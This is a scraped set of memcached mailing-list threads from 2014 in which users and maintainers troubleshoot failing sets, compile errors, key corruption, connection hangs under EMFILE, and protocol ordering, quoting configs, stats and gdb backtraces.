we've been seeing 10-20 failures per hour across our entire environment, where $c-set returns false. I just spend some time with tcpdump and wireshark watching the memcached traffic over port 11211. The keys that are failing are *not* in the tcpdump, so I'm thinking Cache::Memcached has lost a connection or got a non-functioning socket somehow? Does anything in this scenario give anybody any ideas of what might be going wrong? Each memcached node has about 250 connections at any given time and is handling up to 350 gets/sets per second. The load on these webservers is around 1 (eight-core boxes). Their total network traffic is about 30 Mb/sec, and memcached traffic is about 3 Mb/sec. There's nothing in memcached's logs. This is debian 6 (squeeze). $ dpkg -l | grep memcached ii libcache-memcached-perl 1.29-1 Perl module for using memcached servers ii memcached 1.4.5-1+deb6u1 A high-performance memory object caching system -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- Joe SteffeeLinux Systems Administrator bepress -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Compile fails on Mavericks (Xcode 5 really)
Please use a newer source tarball from http://memcached.org/ - this was fixed ages ago. On Sat, 29 Nov 2014, vivek verma wrote: Hi, Can you please specify how to manually remove pthread? I don't have certain rights in the system, so can't follow other solutions. Thanks On Wednesday, October 23, 2013 8:18:35 PM UTC+5:30, Matt Galvin wrote: Hello, On both Mac OS X 10.8 and the new 10.9 with Xcode 5 memcached fails to compile. Is this a know issue already? Is there a fix in the works already? ./configure --enable-64bit --with-libevent=/usr/local --- gcc -v Configured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx-include-dir=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/include/c++/4.2.1 Apple LLVM version 5.0 (clang-500.2.79) (based on LLVM 3.3svn) Target: x86_64-apple-darwin13.0.0 Thread model: posix --- gcc -DHAVE_CONFIG_H -I. -DNDEBUG -I/usr/local/include -m64 -g -O2 -pthread -pthread -Wall -Werror -pedantic -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -MT memcached-cache.o -MD -MP -MF .deps/memcached-cache.Tpo -c -o memcached-cache.o `test -f 'cache.c' || echo './'`cache.c mv -f .deps/memcached-cache.Tpo .deps/memcached-cache.Po gcc -m64 -g -O2 -pthread -pthread -Wall -Werror -pedantic -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -L/usr/local/lib -Wl,-rpath,/usr/local/lib -o memcached memcached-memcached.o memcached-hash.o memcached-slabs.o memcached-items.o memcached-assoc.o memcached-thread.o memcached-daemon.o memcached-stats.o memcached-util.o memcached-cache.o -levent clang: error: argument unused during compilation: '-pthread' clang: error: argument unused during compilation: '-pthread' make[2]: *** [memcached] Error 1 make[1]: *** [all-recursive] Error 1 make: *** [all] Error 2 --- If I manually remove the -pthread(s) it compiles fine but I'm not sure if that is the correct fix as I've not done any development on memcached as of yet. Thoughts? Thanks, Matt -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: sets failing, nothing going over the network
Hey, http://memcached.org/timeouts - sounds like you've already done some tcp dumping, so checking the stats as mentioned in here and running the test script a bit should illuminate things a bit. On Fri, 21 Nov 2014, kgo...@bepress.com wrote: A couple months ago, we moved our memcached nodes from a dedicated VM to having one each on our four baremetal web servers (mod_perl). Since we moved, we've been seeing 10-20 failures per hour across our entire environment, where $c-set returns false. I just spend some time with tcpdump and wireshark watching the memcached traffic over port 11211. The keys that are failing are *not* in the tcpdump, so I'm thinking Cache::Memcached has lost a connection or got a non-functioning socket somehow? Does anything in this scenario give anybody any ideas of what might be going wrong? Each memcached node has about 250 connections at any given time and is handling up to 350 gets/sets per second. The load on these webservers is around 1 (eight-core boxes). Their total network traffic is about 30 Mb/sec, and memcached traffic is about 3 Mb/sec. There's nothing in memcached's logs. This is debian 6 (squeeze). $ dpkg -l | grep memcached ii libcache-memcached-perl 1.29-1 Perl module for using memcached servers ii memcached 1.4.5-1+deb6u1 A high-performance memory object caching system -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: memcached 1.4.13: -remove() sometimes doesn't work
Are your sets or any other functions failing sometimes? Are you just more likely to notice with a delete? The only issues have always been with the client. Old clients would send invalid args to the delete command (though it doesn't seem like you're doing that here). You might just be failing to connect sometimes, double check http://memcached.org/timeouts for ideas or things to try. On Wed, 26 Nov 2014, Alexander Kant wrote: Hello. Currently I'm using memcached 1.4.13. Sometimes the -remove() method doesn't work. It looks like that the value stays there. I can't say when it exactly doesn't work, but several hundreds times it works as expected: the value will be cached, and can be removed without problems - so the code looks really good at that place. But after several hundreds of successfull times, it doesn't remove the value. The question is: is/was this a known problem? Does anybody have some ideas? I'm usind the Zend Framework. Here is the important part of PHP code: public static function getCache() { if (!self::$cache) { $options = array( 'servers' = array( array( 'host' = Config::get('cache.memcached.host'), 'port' = Config::get('cache.memcached.port'), 'persistent' = true, 'weight' = 1, 'timeout' = 5, 'retry_interval' = 15, 'status' = true, 'default_lifetime' = 3600 ), ), ); self::$cache = Zend_Cache::factory('Core', 'Memcached', array('caching' = true, 'automatic_serialization' = true, 'lifetime' = null), $options); } return self::$cache; } public function getCountCached($user_id) { $cache = System::getCache(); $cache_id = 'count_values__' . $user_id; if ($cache-test($cache_id)) { $data = $cache-load($cache_id); } else { $data = $this-countValues($user_id); $cache-save($data, $cache_id, array(), Time::hours(2)); } return (int)$data; } public function invalidateCountCache($user_id) { $success = false; for ($i = 0; $i 5; $i++) { if (!$success) { $success = System::getCache()-remove('count_values__' . $user_id); } else { return; } } } As I somewhere read before: -remove() method also often returns FALSE, also in case of removing was successful. I hope somebody have some Idea. With best regards, Alex -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Diagnosing Corruption
You're probably getting spaces or newlines into your keys, which can cause the client protocol to desync with the server. Then you'll get all sorts of junk into random keys (or random responses from keys which're fine). Either filtering those or using the binary protocol should fix that for you. On Wed, 19 Nov 2014, labnext...@gmail.com wrote: Hi Boris, I think I may have mislead you. It is not one or two keys that get corrupted, it seems that most (if not all) keys fetched return incorrect data. For example during one of these failures (just this morning), a session key (prefixed with session_) returned an array related to a customer record (prefixed with lab_), a key related to a customer return a string related to a translation, and a key related to a translation returned All heck breaks loose (seemingly) across all keys. A flush brings things back into the fold. Make sense? Thanks, Mike On Wednesday, November 19, 2014 2:22:50 PM UTC-4, Boris wrote: I can think of many ways to screw up an application in a way that you describe. Simple programmer error can lead to this sort of behavior. I'd just log every time you do a set for that key with value type you are setting. On Wed, Nov 19, 2014 at 1:00 PM, labne...@gmail.com wrote: Thanks Boris, I haven't really given that much thought. Out of curiosity, why do you think the issue might be on the client end? I ask, cause I really don't have a sense of what to look for on that end and wonder if you might have some suggestions. Best, Mike On Wednesday, November 19, 2014 12:46:16 PM UTC-4, Boris wrote: Hi Mike, this sounds to me more like a client/coding error rather than memcached server. That's where I would focus first. Boris On Wed, Nov 19, 2014 at 11:41 AM, labne...@gmail.com wrote: I just had another failure. After pulling down my apache web servers, and before restarting memcached I grabbed stats to see if they showed anything of interest: - All 3 servers were reporting for duty following a getServerStatus (PHP client call) - curr_connections were listed as 8 across all the instances (apache was down but cron jobs up, so that would have dropped things down considerably) - listen_disabled_num was listed as 0 across all the instances - accepting_conns was listed as 1 across all the instances - evictions listed as 0 - All items across all instances had an evicted and evicted_nonzero and evicted_time value of 0 - All slabs across all instances had a total_pages value of 1 - tailrepairs and outofmemory is listed with a value of 0 across all items in each instance - global hit rate is 0.9937 - get_hits is always* greater than cmd_set on a per slab basis. *One slab reported both values as equal As far as I can tell, memcache is reporting that the world is fine and dandy. Should I be enlarging scope of the search to look at OS related factors that could result in the client receiving bad data? None of the machines are dipping into swap. Thanks, Mike On Wednesday, November 19, 2014 9:35:19 AM UTC-4, labne...@gmail.com wrote: For what it is worth, I'm hesitant to upgrade memcached to the latest version as a step to try and solve this issue. It seems to me that since our installs have been running without issue for quite some time (close to a year), that there are other variables at play here. I just don't understand the variables. ;) Thanks, Mike On Tuesday, November 18, 2014 2:00:46 PM UTC-4, labne...@gmail.com wrote: Hi There, I'm trying to diagnose a new problem with Memcache that seems to be happening with greater frequency. The issue has to do with memcache get requests returning incorrect responses (data from from other keys returned). Restarting or flushing the servers seems to resolve the issue. Do any memcache veterans have any suggestions of how I might dig into this issue? Stats that I might want to trace, log files to look at, etc? Does maybe this symptom fit the description of any known issues? I'm keeping a casual eye on on curr_connections, listen_disabled_num, accepting_conns, bytes, and limit_maxbytes (all show nothing unusual). I've verified that all servers and clients are set up in a consistent fashion. I'm not sure where to go from here to better understand the problem. If it helps, I'm running 1.4.13 (ubuntu 12.04 LTS) across 3 servers, connecting in with PHP Memcache 3.0.6 Tips? Mike -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this
Re: memcached-1.4.20 stuck when Too many open connections
There're too many things that will go wrong if malloc fails... There's a stats counter covering some of them. Is that going up for you? Have you disabled overcommit memory? Have you observed the process size when it hangs? malloc should almost never actually fail under normal conditions... On Wed, 5 Nov 2014, Samdy Sun wrote: Hey, I also got a stuck when specifing -m 200. As mentioned previously, that case could happend as below? 1. malloc fails when conn_new() 2. event_add fails when conn_new() 3. other case? And I find another case after code reviewing. Here is, memcached stuck for a while, for which our client close the connection because 200ms-timeout. So, if the previous 1023 connections get timeout and memcached calls transmit to write, Broken pipe error will happend. And then, memcached get TRANSMIT_HARD_ERROR error and calls conn_close immediately. So, it will happend as below? accept(), errno == EMFILE fd1 close, fd2 close, fd3 close, …… fd1023 close, accept_new_conns(false) for EMFILE That just is a supposition, but I will try to log some infomation to prove it. Any way, is it better to call conn_close after for a while, such as waiting for next event when getting TRANSMIT_HARD_ERROR error then to conn_close immediately? 在 2014年10月31日星期五UTC+8下午3时01分06秒,Dormando写道: Hey, How are you reproducing this? How many connections do you typically have open? It's really bizarre that your curr_conns is 5, but your connections are disabled? Even if there's still a race, as more connections close they each have an opportunity to flip the acceptor back on. Can you print what stats settings shows? If it's adjusting your actual maxconns downward it should show there... On Wed, 29 Oct 2014, Samdy Sun wrote: There are no deadlocks, (gdb) info thread * 5 Thread 0xf7771b70 (LWP 24962) 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 4 Thread 0xf6d70b70 (LWP 24963) 0x007ad430 in __kernel_vsyscall () 3 Thread 0xf636fb70 (LWP 24964) 0x007ad430 in __kernel_vsyscall () 2 Thread 0xf596eb70 (LWP 24965) 0x007ad430 in __kernel_vsyscall () 1 Thread 0xf77b38d0 (LWP 24961) 0x007ad430 in __kernel_vsyscall () (gdb) t 1 [Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005c5366 in epoll_wait () from /lib/libc.so.6 #2 0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, tv=0xff8e0cdc) at epoll.c:198 #3 0x0073d714 in event_base_loop (base=0x9305008, flags=0) at event.c:538 #4 0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795 (gdb) (gdb) t 2 [Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 3 [Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005838b6 in nanosleep () from /lib/libc.so.6 #2 0x005836e0 in sleep () from /lib/libc.so.6 #3 0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819 #4 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #5 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 4 [Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 5 [Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a68998 in sendmsg () from /lib/libpthread.so.0 #2 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 #3 drive_machine (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4370 #4 event_handler (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4441 #5 0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at event.c:395 #6 event_base_loop (base=0x9310658, flags=0
Re: memcached-1.4.20 stuck when Too many open connections
Hey, How are you reproducing this? How many connections do you typically have open? It's really bizarre that your curr_conns is 5, but your connections are disabled? Even if there's still a race, as more connections close they each have an opportunity to flip the acceptor back on. Can you print what stats settings shows? If it's adjusting your actual maxconns downward it should show there... On Wed, 29 Oct 2014, Samdy Sun wrote: There are no deadlocks, (gdb) info thread * 5 Thread 0xf7771b70 (LWP 24962) 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 4 Thread 0xf6d70b70 (LWP 24963) 0x007ad430 in __kernel_vsyscall () 3 Thread 0xf636fb70 (LWP 24964) 0x007ad430 in __kernel_vsyscall () 2 Thread 0xf596eb70 (LWP 24965) 0x007ad430 in __kernel_vsyscall () 1 Thread 0xf77b38d0 (LWP 24961) 0x007ad430 in __kernel_vsyscall () (gdb) t 1 [Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005c5366 in epoll_wait () from /lib/libc.so.6 #2 0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, tv=0xff8e0cdc) at epoll.c:198 #3 0x0073d714 in event_base_loop (base=0x9305008, flags=0) at event.c:538 #4 0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795 (gdb) (gdb) t 2 [Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 3 [Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005838b6 in nanosleep () from /lib/libc.so.6 #2 0x005836e0 in sleep () from /lib/libc.so.6 #3 0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819 #4 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #5 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 4 [Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 5 [Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a68998 in sendmsg () from /lib/libpthread.so.0 #2 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 #3 drive_machine (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4370 #4 event_handler (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4441 #5 0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at event.c:395 #6 event_base_loop (base=0x9310658, flags=0) at event.c:547 #7 0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471 #8 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #9 0x005c4aee in clone () from /lib/libc.so.6 (gdb) strace info, there is the only event named maxconnsevent on epoll? epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 10084037}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 20246365}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 30382098}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 40509766}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 50657403}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 60823841}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 71013006}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 81234264}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 91407508}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 101581187}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 111752457}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 121919049}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 132057597}) = 0 在 2014年10月29日星期三UTC+8下午2时47分23秒,Samdy Sun写道: Hello, I got a memcached-1.4.20 stuck problem when EMFILE happen. Here are my memcached's cmdline memcached -s /xxx/mc_usock.11201 -c 1024 -m 4000 -f
Re: memcached-1.4.20 stuck when Too many open connections
Hey, 32-bit memcached with -m 4000 will never work. the best you can do is probably -m 1600. 32bit applications typically can only allocate up to 2G of ram. memcached isn't protected from a lot of malloc failure scenarios, so what you're doing will never work. -m 4000 only limits the slab memory usage. there're a lot of buffers/etc outside of that. Also the hash table, which is measured separately. On Fri, 31 Oct 2014, Samdy Sun wrote: @Dormando, I try my best to reproduce this in my environment, but failed. This just happened on my servers. I use stats command to check the memcached if it is available or not. If the memcached is unavailable, we will not send request to it. This is what I feel strange when my curr_conns is 5 and memcached can't recover itself. I think conn_new call maybe fail, and it call close(fd) directly, not conn_close()? Such as below? 1. malloc fails when conn_new() 2. event_add fails when conn_new() 3. other case? Take notice of that I build memcached on 32-bit system and it runs on 64-bit system. Additionally, I use -m 4000 for memcached's start. Thanks, Samdy Sun 在 2014年10月31日星期五UTC+8下午3时01分06秒,Dormando写道: Hey, How are you reproducing this? How many connections do you typically have open? It's really bizarre that your curr_conns is 5, but your connections are disabled? Even if there's still a race, as more connections close they each have an opportunity to flip the acceptor back on. Can you print what stats settings shows? If it's adjusting your actual maxconns downward it should show there... On Wed, 29 Oct 2014, Samdy Sun wrote: There are no deadlocks, (gdb) info thread * 5 Thread 0xf7771b70 (LWP 24962) 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 4 Thread 0xf6d70b70 (LWP 24963) 0x007ad430 in __kernel_vsyscall () 3 Thread 0xf636fb70 (LWP 24964) 0x007ad430 in __kernel_vsyscall () 2 Thread 0xf596eb70 (LWP 24965) 0x007ad430 in __kernel_vsyscall () 1 Thread 0xf77b38d0 (LWP 24961) 0x007ad430 in __kernel_vsyscall () (gdb) t 1 [Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005c5366 in epoll_wait () from /lib/libc.so.6 #2 0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, tv=0xff8e0cdc) at epoll.c:198 #3 0x0073d714 in event_base_loop (base=0x9305008, flags=0) at event.c:538 #4 0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795 (gdb) (gdb) t 2 [Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 3 [Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005838b6 in nanosleep () from /lib/libc.so.6 #2 0x005836e0 in sleep () from /lib/libc.so.6 #3 0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819 #4 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #5 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 4 [Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 5 [Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a68998 in sendmsg () from /lib/libpthread.so.0 #2 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 #3 drive_machine (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4370 #4 event_handler (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4441 #5 0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at event.c:395 #6 event_base_loop (base=0x9310658, flags=0) at event.c:547 #7 0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471 #8 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #9
Re: memcached-1.4.20 stuck when Too many open connections
You're absolutely sure the running version was 1.4.20? that looks like a bug that was fixed in .19 or .20 hmmm... maybe a unix domain bug? On Tue, 28 Oct 2014, Samdy Sun wrote: Hello, I got a memcached-1.4.20 stuck problem when EMFILE happen. Here are my memcached's cmdline memcached -s /xxx/mc_usock.11201 -c 1024 -m 4000 -f 1.05 -o slab_automove -o slab_reassign -t 1 -p 11201. cat /proc/version Linux version 2.6.32-358.el6.x86_64 (mockbu...@x86-022.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jan 29 11:47:41 EST 2013 memcached-1.4.20 stuck and don't work any more when it runs for a period of time. Here are some information for gdb: (gdb) p stats $2 = {mutex = {__data = {__lock = 0, __count = 0, __owner = 0, __kind = 0, __nusers = 0, {__spins = 0, __list = {__next = 0x0}}}, __size = '\000' repeats 23 times, __align = 0}, curr_items = 149156, total_items = 9876811, curr_bytes = 3712501870, curr_conns = 5, total_conns = 39738, rejected_conns = 0, malloc_fails = 0, reserved_fds = 5, conn_structs = 1012, get_cmds = 0, set_cmds = 0, touch_cmds = 0, get_hits = 0, get_misses = 0, touch_hits = 0, touch_misses = 0, evictions = 0, reclaimed = 0, started = 0, accepting_conns = false, listen_disabled_num = 1, hash_power_level = 17, hash_bytes = 524288, hash_is_expanding = false, expired_unfetched = 0, evicted_unfetched = 0, slab_reassign_running = false, slabs_moved = 20, lru_crawler_running = false, disable_write_by_exptime = 0, disable_write_by_length = 0, disable_write_by_access = 0, evicted_write_reply_timeout_times = 0} (gdb) p allow_new_conns $4 = false And I found that allow_new_conns just set to false when accept failed and errno is EMFILE. Here are the codes: static void drive_machine(conn *c) { …… } else if (errno == EMFILE) { if (settings.verbose 0) fprintf(stderr, Too many open connections\n); accept_new_conns(false); stop = true; } else { …… } If I change the flag allow_new_conns, it can work again. As below: (gdb) set allow_new_conns=1 (gdb) p allow_new_conns $5 = true (gdb) c Continuing. I know that allow_new_conns will be set to true when conn_close called. But how could it happen for the case that when accept failed , and errno is EMFILE, and this connection is the only one for accepting. Notes that curr_conns = 5. Not run out of fd: ls /proc/1748(memcached_pid)/fd | wc -l 17 -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Is memcached server response guaranteed to be in order?
with the ascii protocol, yes. It would not work otherwise. with the binary protocol, the answer is also currently yes, but the ordering isn't strict and could be up to the individual commands. On Wed, 22 Oct 2014, Yaowen Tu wrote: If I have a client that creates a TCP connection, and send multiple commands to the memcached server, will server guaranteed to respond to these commands in the same order? Thanks, Yaowen -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Is memcached server response guaranteed to be in order?
I don't believe any binprot commands are out of order presently. However the protocol *allows* them to be out of order. it's probably a bug you're seeing in the client. also make sure your memcached daemon is up to date. On Thu, 23 Oct 2014, Yaowen Tu wrote: Thanks for your response. Could you please give me more information about individual commands? In which case it would be out of order? I am using xmemcached client and seeing some weird behavior with binary command, but text command works. I know there are some bugs in xmemcached client binary command code, I am trying to dig deeper to see if it is because of ordering of memcached responses. Based on your answer it is highly possible, so I would be really appreciated if you could share with me more detailed information. Thanks, Yaowen Yaowen On Thu, Oct 23, 2014 at 5:19 PM, dormando dorma...@rydia.net wrote: with the ascii protocol, yes. It would not work otherwise. with the binary protocol, the answer is also currently yes, but the ordering isn't strict and could be up to the individual commands. On Wed, 22 Oct 2014, Yaowen Tu wrote: If I have a client that creates a TCP connection, and send multiple commands to the memcached server, will server guaranteed to respond to these commands in the same order? Thanks, Yaowen -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Max number of concurrent updates for a same key at same time in memcache.
Internally, there's a per-item lock, so an item can only be updated by one thread at a time. This is *just* during the internal update, not while a client is uploading or downloading data to the key. You can probably do several thousand updates per second to the same key without problem (like incr'ing in a loop). Possibly a lot more (100k+) What're you trying to do which requires updating one key so much? On Tue, 21 Oct 2014, Shashank Sharma wrote: Hi all, Reading memcache documents its clear that it can handle a very heavy load of traffic. However I was more interested in knowing the bound on how may updates for a specific key at the same time can memcache handle. -Shashank -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Collision Resolution mechanism
